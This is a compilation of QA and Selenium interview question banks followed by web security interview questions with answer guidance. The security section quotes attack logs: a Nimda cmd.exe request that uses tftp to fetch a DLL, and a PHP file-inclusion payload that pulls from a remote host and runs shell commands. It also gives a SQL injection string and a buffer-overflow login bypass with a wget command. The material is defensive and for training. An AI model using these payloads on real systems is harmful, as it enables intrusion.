Knowledge Work Book – Interview Question Bank(QA)

Company: Cybage Software [An SEI-CMMI Level 5 assessed &  V1.3 Company]  www.cybage.com

Interview Type: Walk-in/Referral walk-in

Date: 11^th August 2012

Venue: CT1, Kalyaninagar, PUNE

Rakesh Hansalia (QA, Cybage, Gandhinagar )  http://www.linkedin.com/in/rakeshhansalia
Below are the questions which were asked to the candidates in the walk-in interview for QA position:

1)      Describe yourself

2)      Describe your current project?

3)      Which is the android latest version?

4)      What is the difference between Android 2.1 and Android 2.2?

5)      Oops concepts.

6)      Difference between a class and a interface.

7)      Different version control.

8)      SQL queries.

9)      Do you have any idea of join in sql?

10)  Test case format

11)  What are smoke, regression and functional testing?

12)  Bug Life cycle

13)  What is equivalence partitioning?

14)  How to identify an object in selenium and QTP?

15)  How to display a message in Selenium?

16)  Different views in QTP.

17)  Different modes in QTP.

18)  What is test automation framework?

19)  What are different types of automation frameworks?

20)  How you do security testing for an application?

21)  What content you include in test status report?

22)  How you have mentored your team? ( This question is applicable if you have written in your CV that you have mentored)

23)  Have you prepared test plan? If yes, then what content you include in test plan?

24)  Would you like to ask any questions from us?

25)  Describe application certification testing.

26)  How you do certification testing?

27)  What role you are playing in your current company?

28)  What are the differences and similarity between the mobile app which you are testing in your current project with the app if you tested it on windows?

29)  Difference between System testing and Functional testing.

30)  3 most important test scenarios for a pen.

31)  3 least important test scenarios for a pen from user point of view.

32)  Suppose 100 requirements are there, how will you estimate them?

33)  Suppose 1000 tcs are there, will you run all 1000 tcs on all devices?

34)  3 assert commands.

35)  Difference between Selenium Web driver, RC and IDE.

36)  Rate yourself for automation.

37)  What are the components of QTP?

38)  Do you have knowledge of sql?

39)  What is compatibility testing? Is compatibility testing functional or non functional?

40)  What is non-functional testing?

41)  Relate usability and reliability with your current project.

42)  Suppose somebody is not comfortable with you in your team and he/she does not tell anybody what he/she feels but you know that your peer is not comfortable then what will you do?

43)  If you have mentioned hobbies in your resume, then they can ask you questions related to your hobbies.

44)  Do you have any questions which you want to ask?

45)  What is root cause analysis?

46)  3 scenarios for which you as a tester can’t do root cause analysis or help developer to know the what is the reason for a bug?

47)  write a c program to create a pattern :       1

2 2

3  3  3

48) What is stdio.h?

49) What is a library?

50) Tell me the names of 3 libraries.

51) Tell me the names of 5 automation tools for mobile.

52) Suppose you are the only resource and work is of 3 days and you have to complete it in 2 days, then what will you do?

53) Suppose you have to select device for an application which should work on latest as well as previous Android versions, then which device will you select?

54) What is polymorphism?

23.224820 72.646377

Interview Questions @ Polaris

a. Interview Date:29-05-2010
b. Company Name: Polaris
c. Location:Hyderabad

I faced following questions in Polaris Interview.

1. Tell me about u r current organization
2. what is Black box testing?
3. what is white box testing?
4. What is Functional Testing?
5. What is difference between Black box & functional
6. what is test plan?
7. what is test strategy?
8. what is difference between Test plan & test strategy?
9. What is smoke testing
10 what is sanity testing?
11. who will perform smoke testing?
12. Explain about Agile process?
13. How much you know about QTP? ( I mentioned in my resume as Exposure on QTP)
14. Explain about u r current project?
15. What is the Requirement Traceability Matrix?
16. Can u draw the template for Requirement Traceability Matrix?
17. What is Ad-hoc Testing?
18. What is difference between ReTesting and Regression Testing.
19. Can u explain about Bug life cycle?
20. How can u make sure  whether all requirements are covered or not?
21. Can u explain biggest complexity in current project?
22. what is difference between bug severity and priority?
23. Which bug tracking tool is u r using?
24. can u give one example for High severity and low priority bug?
25. can u give one example for High priority and low severity bug?
26. What is security Testing?

23.224820 72.646377

Selenium IDE Interview Questions & Answers -Rakesh Hansalia

1. What do you know about Selenium?
Selenium is a suite of tools for web automation testing. Selenium first came to life in 2004 when Jason Huggins was testing an internal application at Thought Works. Selenium was a tremendous tool, it wasn’t without its drawbacks. Because of its JavaScript based automation engine and the security limitations browsers apply to JavaScript, different things became impossible to do.
Selenium Suite of projects includes:
Selenium IDE
Selenium Core
Selenium 1 (known as Selenium RC or Remote Control)
Selenium 2 (known as Selenium Web driver)
Selenium-Grid

 

2. What are the technical challenges with selenium?

As you know Selenium is a free ware open source testing tool. There are many challenges with Selenium.

–>Selenium Supports only web based applications
–>It doesn’t support any non web based (Like Win 32, Java Applet, Java Swing, .Net Client Server etc) applications
–>When you compare selenium with QTP, Silk Test, Test Partner and RFT, there are many challenges in terms of maintainability of the test cases
–>Since Selenium is a freeware tool, there is no direct support if one is in trouble with the support of applications
–>There is no object repository concept in Selenium, so maintainability of the objects is very high
–>There are many challenges if one have to interact with Win 32 windows even when you are working with Web based applications
–>Bitmap comparison is not supported by Selenium

–>Any reporting related capabilities, you need to depend on third party tools

–>You need to learn any one of the native language like (.Net, Java, Perl, Python, PHP, Ruby) to work efficiently with the scripting side of selenium

 

3. What are the test types supported by Selenium?

Selenium could be used for testing the web based applications.

The test types can be supported are:

1. Functional,
2. Regression,
3. Load testing

The automation tool could be implemented for post release validation with continuous integration tools like:
1. Jenkins,
2. Hudson,
3. Quick Build
4. CruiseCont

 

4. What are the capabilities of Selenium IDE?

Selenium IDE (Integrated Development Environment) works similar to commercial tools like QTP, Silk Test and Test Partner etc. The below mentioned points describes well about Selenium IDE.

1. Selenium IDE is a Firefox add-on.
2. Selenium IDE can support recording the clicks, typing, and other actions to make a test cases.
3. Using Selenium IDE A Tester can play back the test cases in the Firefox browser
4. Selenium IDE supports exporting the test cases and suites to Selenium RC.
5. debugging of the test cases with step-by-step can be done
6. Breakpoint insertion is possible
7. Page abstraction functionality is supported by Selenium IDE
8. Selenium IDE can support an extensibility capability allowing the use of add-ons or user extensions that expand the functionality of Selenium IDE

 

5. What are the challenges with Selenium IDE?

Selenium-IDE does not directly support:

1. Condition statements
2. Iteration or looping
3. Logging and reporting of test results
4. Error handling, particularly unexpected errors
5. Database testing
6. Test case grouping
7. Re-execution of failed tests
8. Test case dependency
9. Capture screenshots on test failures
10. Results Report generations

 

6. Which are the browsers supported by Selenium IDE?

Selenium IDE supports only one browser Mozilla Firefox. The versions supported as of now are:

Mozilla Firefox 2.x
Mozilla Firefox 3.x

The versions not supported as of now are:
earlier versions of Mozilla Firefox 2.x
Mozilla Firefox 4.x

 

7. How to execute a single line command from Selenium IDE?

Single line command from Selenium IDE can be executed in two ways

1. Right click on the command in Selenium IDE and select “Execute This Command”
2. Select the command in Selenium IDE and press “X” key on the keyboard

 

8. How to insert a start point in Selenium IDE?

Start point Selenium IDE can be set in two ways

1. Right click on the command in Selenium IDE and select “Set / Clear Start Point”
2. Select the command in Selenium IDE and press “S” key on the keyboard
3. You can have only one start point
4. If you have already set one start point and you selected other command as start point. Then the first start point will be removed and the new start point will be set

 

9. How to insert a comment in Selenium IDE?

Comments in Selenium IDE can be set in two ways

1. Right click on the command in Selenium IDE and select “Inert New Comment”
2. If you want to comment an existing line. You need to follow the below mentioned steps.

a. Select the source tab in IDE
b. Select the line which you want to comment
c. Assume that if you want to comment a open command you need to write like below mentioned code

<tr>

<!–

<td>open&l/td>
<td>/node/304/edit&l/td>
<td></td>

–>

</tr>

 

10. How to insert a break point in Selenium IDE?

Break point can be set in two ways in Selenium IDE

1. Right click on the command in Selenium IDE and select “Toggle Break Point”
2. Select the command in Selenium IDE and press “B” key on the keyboard
3. If you want to clear the break point once again Spress “B” key on the keyboard
4. You can set multiple break points in Selenium IDE

 

11. How to debug the tests in Selenium IDE?

To debug or execute the test cases line by line. Follow the below mentioned steps

1. Insert a break From the location where you want to execute step by step
2. Run the test case
3. Execution will be paused at the given break point
4. Click on the step (Blue) button to continue with the next statement
5. Click on Run button, to continue executing all the commands at a time

 

12. How to export the tests from Selenium IDE to Selenium RC in different languages?

From selenium IDE the test cases can be exported into the languages

1. .Net
2. Java
3. Perl
4. Python
5. PHP
6. Ruby

The below mentioned steps can explain how to export the test cases

1. Open the test case from Selenium IDE
2. Select File -> Export Test Case As

 

13. How to export Selenium IDE Test Suite to Selenium RC Suites?

From selenium IDE the test suites can be exported into the languages as mentioned below

1. .Net
2. Java
3. Perl
4. Python
5. PHP
6. Ruby

The below mentioned steps can explain how to export the test suites

1. Open the test case from Selenium IDE
2. Select File -> Export Test Suite As

 

14. Which is the command used for displaying the values of a variable into the output console or log?

The command used for displaying the values of a variable into the output console or log – echo

If you want to display a constant string. The below mentioned command can be used
echo <constant string>
ex: echo “The sample message”

If you want to display the value of a variable it can be written like below
echo ${<variable name>>

ex: echo ${var1}

Note: Here var1 is the variable

 

15. Which are the browsers supported by Selenium RC?

Supported browsers for Selenium RC include:

1. *firefox
2. *mock
3. *firefoxproxy
4. *pifirefox
5. *chrome
6. *iexploreproxy
7. *iexplore
8. *firefox3
9. *safariproxy
10. *googlechrome
11. *konqueror
12. *firefox2
13. *safari
14. *piiexplore
15. *firefoxchrome
16. *opera
17. *iehta
18. *custom

 

16. Which are the Operating Systems supported by Selenium?

Selenium IDE
Works in Firefox 2+ Start browser, run tests Run tests
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others whichever supports Firefox 2+

Selenium Remote Control
Used for starting browser and run tests
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others

Selenium Core
Used for running tests
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others

 

17. What is Selenium RC?

Selenium-RC is the solution for tests that need a little more than just simple browser actions and a linear execution. Selenium-RC leverages the full power of programming languages, creating tests that can do things like read and write external files, make queries to a database, send emails with test reports, and practically anything else a user can do with a normal application.

You will want to use Selenium-RC whenever your test requires logic not supported by running a script from Selenium-IDE

 

18. Why Selenium RC is used?

Selenium-IDE does not directly support:

1. condition statements
2. iteration
3. logging and reporting of test results
4. error handling, particularly unexpected errors
5. database testing
6. test case grouping
7. re-execution of failed tests
8. test case dependency
9. capture screenshots on test failures

The reason behind why Selenium-IDE does not support the above mentioned requirements is IDE supports only HTML language. Using HTML language we cannot achieve the above mentioned requirements. Because HTML does not support conditional, looping and external source connectives.

To overcome the above mentioned problems Selenium RC is used.

Since Selenium RC supports the languages .Net, Java, Perl, Python, PHP, and Ruby. In these languages we can write the programme to achieve the IDE issues

 

19. Which are the languages supported by Selenium RC?

The languages supported by Selenium RC

1. .Net,
2. Java (Junt 3, Junt 4, TestNG, Groovy)
3. Perl,
4. Python,
5. PHP,
6. Ruby

 

20. What is Selenium Grid?

Selenium Grid is part of Selenium suite of projects. Selenium Grid transparently distribute your tests on multiple machines so that you can run your tests in parallel, cutting down the time required for running in-browser test suites. This will dramatically speeds up in-browser web testing, giving you quick and accurate feedback you can rely on to improve your web application.

 

21. What is Selenium WebDriver or Google WebDriver or Selenium 2.0?

WebDriver uses a different underlying framework from Selenium’s javascript Selenium-Core. It also provides an alternative API with functionality not supported in Selenium-RC. WebDriver does not depend on a javascript core embedded within the browser, therefore it is able to avoid some long-running Selenium limitations.

WebDriver’s goal is to provide an API that establishes
• A well-designed standard programming interface for web-app testing.
• Improved consistency between browsers.
• Additional functionality addressing testing problems not well-supported in Selenium 1.0.

The Selenium developers strive to continuously improve Selenium. Integrating WebDriver is another step in that process. The developers of Selenium and of WebDriver felt they could make significant gains for the Open Source test automation community be combining forces and merging their ideas and technologies. Integrating WebDriver into Selenium is the current result of those efforts.

 

22. What are the capabilities of Selenium WebDriver or Google WebDriver or Selenium 2.0?

One should use WebDriver when requiring improved support for

• Mult-browser testing including improved functionality for browsers not well-supported by Selenium-1.0.
• Handling multiple frames, multiple browser windows, popups, and alerts.
• Page navigation.
• Drag-and-drop.
• AJAX-based UI elements.

 

23. What is the architecture of Selenium RC?

The Selenium Server which launches and kills browsers, and acts as an HTTP proxy for browser requests.

Client libraries for various programming languages, each of which instructs the Selenium Server in how to test the AUT by passing it your test script’s Selenium commands.

The diagram shows the client libraries communicate with the Server passing each Selenium command for execution. Then the server passes the Selenium command to the browser using Selenium-Core JavaScript commands. The browser, using its JavaScript interpreter, executes the Selenium command, which effectively, runs the check you specified in your Selenese test script.

 

24. What is the architecture of Selenium Grid?

The below mentioned theory explains about the setup of Selenium Grid with architecture and how it works.

Selenium Grid builds on the traditional Selenium setup, taking advantage of the following properties:

* The Selenium test, the application under test, and the remote control/browser pair do not have to be co-located. They communicate through HTTP, so they can all live on different machines.
* The Selenium tests and the web application under test are obviously specific to a particular project. Nevertheless, neither the Selenium remote control nor the browser is tied to a specific application. As a matter of fact, they provide a capacity that can easily be shared by multiple applications and multiple projects.

Consequently, if only we could build a distributed grid of Selenium Remote Controls, we could easily share it across builds, applications, projects – even potentially across organizations. Of course we would also need to address the scalability issues as described earlier when covering the traditional Selenium setup. This is why we need a component in charge of:

* Allocating a Selenium Remote Control to a specific test (transparently)
* Limiting the number of concurrent test runs on each Remote Control
* Shielding the tests from the actual grid infrastructure

Selenium Grid calls this component the Selenium Hub.

* The Hub exposes an external interface that is exactly the same as the one of a traditional Remote Control. This means that a test suite can transparently target a regular Remote Control or a Selenium Hub with no code change. It just needs to target a different IP address. This is important as it shields the tests from the grid infrastructure (which you can scale transparently). This also makes the developer’s life easier. The same test can be run locally on a developer machine, or run on a heavy duty distributed grid as part of a build – without ever changing a line of code.
* The Hub allocates Selenium Remote Controls to each test. The Hub is also in charge of routing the Selenese requests from the tests to the appropriate Remote Control as well as keeping track of testing sessions.
* When a new test starts, the Hub puts its first request on hold if there is no available Remote Control in the grid providing the appropriate capabilities. As soon as a suitable Remote Control becomes available, the Hub will serve the request. For the whole time, the tests do not have to be aware of what is happening within the grid; it is just waiting for an HTTP response to come back.

 

25. Does Selenium support mobile internet testing?

Selenium supports Opera. And opera is used in most of the Smart phones. So whichever Smart phone supports opera, selenium can be used to test. So, one can use Selenium RC to run the tests on mobiles.

 

26. Does Selenium support Google Android Operating System?

Yes, Selenium Web Driver or Google Web Driver or Selenium 2.0 supports Android Operating System. There are several libraries written to support Android Operating System.

 

27. What are the types of text patterns available in Selenium?

There are three types of patterns available in Selenium
1. globbing
2. regular expressions
3. exact

 

28. How to use regular expressions in Selenium?

Regular expressions in Selenium IDE can be used with the keyword – regexp: as a prefix to the value and patterns needs to be included for the expected values.

For example if you want to use the regular expression for a command
Command: verifyText
Target: //font/font/b/font[1]
Value: Flight Confirmation # 2011-05-02451

in the above example Flight Confirmation is continuously changing each time you run the test case. So this can be written with a regular expression as mentioned below

Command: verifyText
Target: //font/font/b/font[1]
Value: regexp:Flight Confirmation # [0-9]{4}-[0-9]{2}-[0-9]{5,10}

 

29. What are the regular expression patterns available in Selenium?

Selenium regular expression patterns offer the same wide array of special characters that exist in JavaScript. Below are a subset of those special characters

PATTERN	MATCH
.	any single character
[ ]	character class: any single character that appears inside the brackets
*	quantifier: 0 or more of the preceding character (or group)
+	quantifier: 1 or more of the preceding character (or group)
?	quantifier: 0 or 1 of the preceding character (or group)
{1,5}	quantifier: 1 through 5 of the preceding character (or group)
|	alternation: the character/group on the left or the character/group on the right
( )	grouping: often used with alternation and/or quantifier

 

30. What is Selenese?

Selenium set of commands which are used for running the test are called as Selenese.

There are three types of Selenese, those are:
1. Actions – used for performing the operations and interactions with the target elements
2. Assertions – used as check points
3. Accessors – used for storing the values in a variable

 

31. How do you add check points or verification points in Selenium?

check points or verification points are known as Assertions in Selenium. The keywords with below mentioned prefix will be used for adding check points or verification points.

1. verify
2. assert
3. waitFor

 

32. What is Assertion in Selenium?

Assertion is nothing but a check or verification point.

Assertion verifies the state of the application conforms to what is expected.
Examples include “make sure the page title is X” and “verify that this checkbox is checked.

 

33. What are the types of Assertions there in Selenium?

Selenium Assertions can be used in 3 modes:

1) assert – When an “assert” fails, the test will be aborted. If you are executing test suite, the next state case will start

2) verify – When a “verify” fails, the test will continue execution, logging the failure.

3) waitFor – “waitFor” commands wait for some condition to become true (which can be useful for testing Ajax applications). They will succeed immediately if the condition is already true. However, they will fail and halt the test if the condition does not become true within the current timeout setting

 

34. When to use Assert, Verify and WaitFor in Selenium?

1) assert – If the expected value is mandatory to continue with the next set of steps we will use Assert. As Assert aborts the test, if the expected value doesn’t match. It is good to use for any mandatory checks.

2) verify – If the expected value is optional to continue with the next set of steps we will use Verify. As Verify continues executing with the next set of steps, if the expected value doesn’t match. It is good to use for any optional checks.

3) waitFor – If your test needs to wait, if the expected value is not matching we use waitFor. We normally use waitFor for AJAX kind of controls loading within a page

 

35. What is an Accessor in Selenium?

Accessor is one of the type of Selenese.

I. Accessors are used for storing the value of a target in a variable.

Ex:
1) storeTitle – Stores the title of a window in a variable

2) storeText – Stores the target element text in a variable

II. Accessors are also used for evaluating the result and storing the result in a variable

Ex: storeTextPresent – Evaluates whether the text is present in the current window. If the text is present stores true in the variable else stores false

Ex: storeEementPresent – Evaluates whether the element is present in the current window. If the element is present stores true in the variable else stores false

 

36. When to use Accessors in Selenium?

Accessors are mostly used for storing the value in a variable.

The variable can be used for following reasons:

1) To get the value from an element and comparing with some dynamic value

2) To take a logical decision to execute the test steps
ex: if the value of the variable true execute step1 and step2 else step3 and step4

3) To execute some statements in a loop based on the value returned by the element

 

37. How to capture bitmaps in Selenium?

Bitmaps are captured using the Selenium set of commands. There are two modes of capturing the bitmaps

1) Capture the bitmap for the entire page – it captures the browser main page area of AUT
2) Capture the bitmap for the screen shots – it captures the entire screen shot like the print scree that you give from your keyboard

Selenium doesn’t support bitmap capturing for an element on AUT.

 

38. Which are the commands used for capturing the bitmaps?

captureEntirePageScreenshot
Saves the entire contents of the current window canvas to a PNG file. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Currently this only works in Firefox when running in chrome mode, and in IE non-HTA using the EXPERIMENTAL “Snapsie” utility. The Firefox implementation is mostly borrowed from the Screengrab! Firefox extension. Please see captureEntirePageScreenshot for more details

captureEntirePageScreenshotAndWait
Saves the entire contents of the current window canvas to a PNG file. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Currently this only works in Firefox when running in chrome mode, and in IE non-HTA using the EXPERIMENTAL “Snapsie” utility. The Firefox implementation is mostly borrowed from the Screengrab! Firefox extension. Please see
captureEntirePageScreenshotAndWait for details.

Note: This command runs with only mozilla firefox when you run the tests from RC. Other browsers it will not support

 

39. What is the difference between captureEntirePageScreenshot and CaptureScreenShot?

captureEntirePageScreenshot
1. This captures the AUT web page only
2. This supports only mozilla firefox
3. Accepts two arguments. one is the file name to be saved and other argument is back ground color

CaptureScreenShot

1. This captures the System screen shot
2. This supports all the browsers when you run from Selenium RC
3. Accepts one argument. That is the file name to be saved.

 

40. How do you set user extensions in Selenium IDE?

1. Open user-extensions.js with an editor (Notepad, etc.); it’s found in the selenium\core\scripts folder. If it doesn’t exist, just create it.
2. If you need to, commit the user-extensions.js file (like if you use subversion).
3. Open Selenium IDE and choose the Options menu and then Options… from that menu.
4. Make sure the path to your user-extensions.js file is entered in the Selenium Core extensions field (like \selenium\core\scripts\user-extensions.js)
5. Press OK button on options
6. Restart the IDE to reflect your extensions.

Note: After reopen, Selenium IDE may show compilations errors if the user-extensions.js file has any syntax errors.

 

41. What are the limitations of Selenium IDE

The limitations of Selenium IDE are:

1) Selenium IDE uses only HTML language
2) Conditional or branching statements execution like using of if, select statements is not possible
3) Looping statements using is not possible directly in Selenium HTML language in ide
4) Reading from external files like .txt, .xls is not possible
5) Reading from the external databases is not possible with ide
6) Exceptional handling is not there
7) A neat formatted Reporting is not possible with ide

To eliminate the above issues we use Selenium RC

 

23.224820 72.646377

Web Security Interview Questions

Web Security Interview Questions

The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions.  These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.

 

Entry Level Questions

 

1. 1.   What do you see as the most critical and current threats effecting Internet accessible websites?

 

Goal of question – To gauge the applicant’s knowledge of current web related threats.  Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics.  Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

 

 

1. 2.   What online resources do you use to keep abreast of web security issues?  Can you give an example of a recent web security vulnerability or threat?

 

Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT.  Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.

 

1. What do you see as challenges to successfully deploying/monitoring web intrusion detection?

 

Goal of question – We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:

 

• Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
• Proper logging – increasing the verboseness of logging (Mod_Security audit_log)
• Remote Centralized Logging
• Alerting Mechanisms
• Updating Signatures/Policies

 

 

1. What is your definition of the term “Cross-Site Scripting”?  What is the potential impact to servers and clients?

 

Goal of question –This question will determine if the applicant is well versed in the terminology used in web security.  The applicant needs to be able to articulate highly technological topics to a wide audience.  The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information.  WASC has a web security glossary of terms that may be of help – http://www.webappsec.org/glossary.html

 

 

Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client.  The web server is merely used as a conduit for the XSS data to be presented to the end client. See also “Client-Side Scripting”.

 

 

1. What are the most important steps you would recommend for securing a new web server? Web application?

 

Goal of question – Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.

 

Web Server Security:

• Update/Patch the web server software
• Minimize the server functionality – disable extra modules
• Delete default data/scripts
• Increase logging verboseness
• Update Permissions/Ownership of files

 

Web Application Security:

• Make sure Input Validation is enforced within the code – Security QA testing
• Configured to display generic error messages
• Implement a software security policy
• Remove or protect hidden files and directories

 

 

Advanced Level Questions

 

1. 1.   Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server.  What does the log entry suggest has happened?  What would you do in response to this entry?

 

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"

68.48.142.117 – – [09/Mar/2004:22:23:48 -0500] “GET /c/winnt/system32/

cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0” 200 566 “-” “-”

 

Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF).  In this scenario, the client system (68.48.142.117) is infected with the Nimda worm.  These requests will not affect our Apache proxy server since this is a Microsoft vulnerability.  While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200).  The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful.  Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

 

If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?

 

You could use either Microsoft’s Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server.  The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.

 

 

1. 2.   You are engaged in a penetration-test where you are attempting to gain access to a protected location.  You are presented with this login screen:

 

What are some examples of you how you would attempt to gain access?

 

Goal of question – Determine if the applicant has a wide knowledge of different authentication vulnerabilities.  They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as – ‘ OR 1=1#).  If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.

 

ODBC Error Code = 37000 (Syntax error or access violation)   [Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near ‘=’.   Data Source = “ECommerceTheArchSupport2” SQL = “SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId =” The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm   The specific sequence of files included or processed is: K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM

 

This error message indicates that the target web application if running Microsoft SQL and discloses directory structures.

 

 

1. 3.   What application generated the log file entry below?  What type of attack is this?  Assuming the index.php program is vulnerable, was this attack successful?

 

========================================

Request: 200.158.8.207 – – [09/Oct/2004:19:40:46 –0400] “POST /index.php HTTP/1.1” 403 743

Handler: cgi-script

—————————————-

POST /index.php HTTP/1.1

Host: http://www.foo.com

Connection: keep-alive

Accept: */*

Accept-Language: en-us

Content-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla 4.0 (Linux)

Content-Length: 65

X-Forwarded-For: 200.158.8.207

mod_security-message: Access denied with code 403. Pattern match “uname\x20-a” at POST_PAYLOAD

mod_security-action: 403

 

65

lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

 

 

Goal of question – to verify that the applicant can interpret various web log files, identify attacks and possible impacts.  The Mod_Security Apache module generated this data in the audit_log file.  The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script.  The commands being passed are in the POST PAYLOAD of the command.  This attack was not successful for the following two reasons:

 

• The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the “uname –a” data in the POST PAYLOAD.
• The attacker also made a typo in the OS commands being passed in the POST PAYLOAD.  She did not include a semicolon “;” between the ls and uname commands.  The target host would fail to execute the “lsuname” command.

 

 

1. 4.   One of your web servers is logging multiple requests similar to the following:

 

201.1.199.155 – – [26/Dec/2004:01:55:48 -0500] “PUT /hacked.htm HTTP/1.0” 403 769 “Microsoft Data Access Internet Publishing Provider DAV 1.1” “-“

What does this log entry indicate?  How could you identify what the contents are of the “hacked.htm” file that the attacker is trying to upload?

 

Goal of question – Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as, the logging limitations of CLF.  In this type of attack, the defacement text is sent in the request body and not on the URL Request line.  In order to identify this data, a network sniffing application would need to be utilized.  An application such as Snort could be used with a custom rule to identify this activity.  Here is an example rule –

 

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:”LOCAL Put attempt”; flow:to_server,established; tag:session,50,packets; pcre:”/^PUT /A”; sid:3000001; rev:1;)

 

 

1. 5.   You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application.  The file is called “logon_validate” and a typical logon request looks like this –

 

“GET /cgi-bin/logon_validate?login=test&password=test”

The source code is shown below –

 

void show_error(void) {   // AUTHENTICATION ERROR   exit(-1);   }   int main(int argc, char **argv) { char error_on_auth=’1′; char user[128]; char pass[128]; char *ch_ptr_begin; char *ch_ptr_end;   /**********************************/ /* Get Username from Query String */ /**********************************/ ch_ptr_begin=(char *)strstr(****QUERY_STRING****,”login=”); if (ch_ptr_begin==NULL) show_error(); ch_ptr_begin+=6; ch_ptr_end=(char *)strstr(ch_ptr_begin,”&”); if (ch_ptr_end==NULL) show_error(); *(ch_ptr_end++)=”; strcpy(user,ch_ptr_begin);     /**********************************/ /* Get Password from Query String */ /**********************************/ ch_ptr_begin=(char *)strstr(ch_ptr_end,”password=”); if (ch_ptr_begin==NULL) show_error(); ch_ptr_begin+=9; ch_ptr_end=(char *)strstr(ch_ptr_begin,”&”); if (ch_ptr_end!=NULL) *(ch_ptr_end++)=”; strcpy(pass,ch_ptr_begin);     if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0)) error_on_auth=’0′;   if (error_on_auth==’0′) {   // AUTHENTICATION OK!!     } else {   // AUTHENTICATION ERROR show_error();     }   // return(0); hehe could be evil ;PPPPP exit(0);   }

 

This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level6/replicant.php

 

Do you see any problems with this script?  How could an attacker exploit this script to bypass the authentication mechanisms in this script?  What are some mitigation options?

 

Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.

 

Reference “Smashing The Stack For Fun And Profit” for technical details –

http://www.phrack.org/phrack/49/P49-14

 

The security issue with this script has to do with a buffer overflow problem in the way that the script is using the “error_on_auth” condition.  The error_on_auth condition is initially declared to be “1” which means that he user is not authenticated.  The “user” condition was declared directly after the error_on_auth and has been allocated 128 bytes.  Due to the ordering of the declaration of the error_on_auth and user parameters, they occupy adjacent locations on the running stack.  The result is that if the attacker submits a username that is 129 bytes (with the last byte being “0”), they can overwrite the error_on_auth data.  A Unix command such as the following would achieve this goal –

 

http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

 

or

 

# wget http://www.companyx.com/cgi-bin/validate_logon?logon=`perl -e print "0"x129`

 

Mitigation options include the following:

• Update the validate_logon soruce code to fix the problem, such as using strncpy() instead of strcpy ().
• If the source code could not be updated, then security filters would need to be implemented on the web server.
• Using Mod_Security, you could implement some security filters for the “validate_logon” URL such as these:
  • Only allow letters in the username argument.  This would prevent the client from overwriting the error_on_auth data with a zero.

 

<Location /cgi-bin/validate_logon>

SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”

</Location>

 

 

• You could also add another rule to restrict the size of the username/password arguments to be less then 129 characters.

 

<Location /cgi-bin/validate_logon>

SecFilterSelective ARG_LOGIN “!^[a-zA-Z]”

SecFilterSelective ARG_LOGIN|ARG_PASSWORD “.{129,}”

</Location>

 

 

A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as “anomalous” and deny them.  A brief listing of WAF vendors include Teros, Netcontiuum, Imperva, Watchfire, Breach, Axiliance, and others.